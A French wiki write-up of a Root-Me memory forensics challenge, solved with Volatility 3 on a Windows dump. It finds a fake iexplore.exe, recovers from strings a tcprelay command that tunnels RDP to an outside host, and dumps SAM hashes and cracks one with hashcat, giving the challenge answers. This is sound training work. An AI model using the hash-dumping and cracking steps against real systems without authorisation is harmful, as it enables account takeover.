Cyber/chall/Root-me/forensic

De InfoXelec
Aller à la navigation Aller à la recherche

CH2 - Command & Control

Le fichier de travail est un dump mémoire.
Pour l'analyser il faut utiliser Volatility. Sur Parrot, c'est la version 3 de Volatility qui est installée par défaut.
Il n'y a pas de niveau 1 et cela commence au niveau 2.

Niveau 2

Récupération d'informations :sudo vol -f ./ch2.dmp windows.info.Info
Récupération du nom de la machine à partir des variables d'environnement : sudo vol -f ./ch2.dmp windows.envars.Envars |grep COMPUTERNAME
On obtient le code pour le niveau 2.

Niveau 3

Lister les processus : sudo vol -f ./ch2.dmp windows.pslist.PsList
Lister les processus liés : sudo vol -f ./ch2.dmp windows.pstree.PsTree
On voit qu'un processus iexplore.exe a ouvert un cmd.exe (2772 -> 1616 0x87cbfd40). C'est probablement le logiciel malveillant.
Afin de l'identifier, il faut lister les commandes : sudo vol -f ./ch2.dmp windows.cmdline.CmdLine
On voit qu'un iexplore est lancé avec la commande :C:\Users\John Doe\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\iexplore.exe
Ceci n'est pas l'emplacement habituel de Internet Explorer.
On récupère le MD5 avec la commande suivante (attention au -n pour ne pas ajouter de retour à la ligne.
echo -n 'C:\Users\John Doe\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\iexplore.exe' | md5sum On obtient le code pour le niveau 3.

Niveau 4

Pour le niveau 4, la commande sudo vol -f ./ch2.dmp windows.netscan.NetScan ne donne pas de résultat.
On va donc faire un dump mémoire du processus qui a lancé le malware. PID 2772 identifié avec la comamnde PsList.
sudo vol -f ./ch2.dmp windows.memmap.Memmap --dump --pid 2772 Cela donne sur l'ordinateur un gros fichier de 126,7Mo.
On tente un strings pid.2772.dmp |grep 192.
On trouve une ligne : tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 qui est un point d'exfiltration.
remis en forme cela donne : 192.168.0.22:3389

Niveau 5

Le but est de retrouver le mot de passe faible.
Il faut donc dans un premier temps faire un dump de la SAM ?
sudo vol -f ./ch2.dmp windows.hashdump.Hashdump
Ce qui donne 3 utilisateurs Administrator, Guest et John Doe
Récupérer dans le fichier dump le hash du mot de passe (dernière colonne en face du nom) et le copier dans un fichier john.txt
Puis utiliser un logiciel de bruteforce pour trouver le mot de passe faible.
On va utiliser hashcat hashcat -m 1000 ./john.txt /usr/share/wordlists/rockyou.txt Au bout de quelques minutes on obtient le mot de passe passw0rd

Récupérée de « http://infoxelec.hd.free.fr/mediawiki/index.php?title=Cyber/chall/Root-me/forensic&oldid=119 »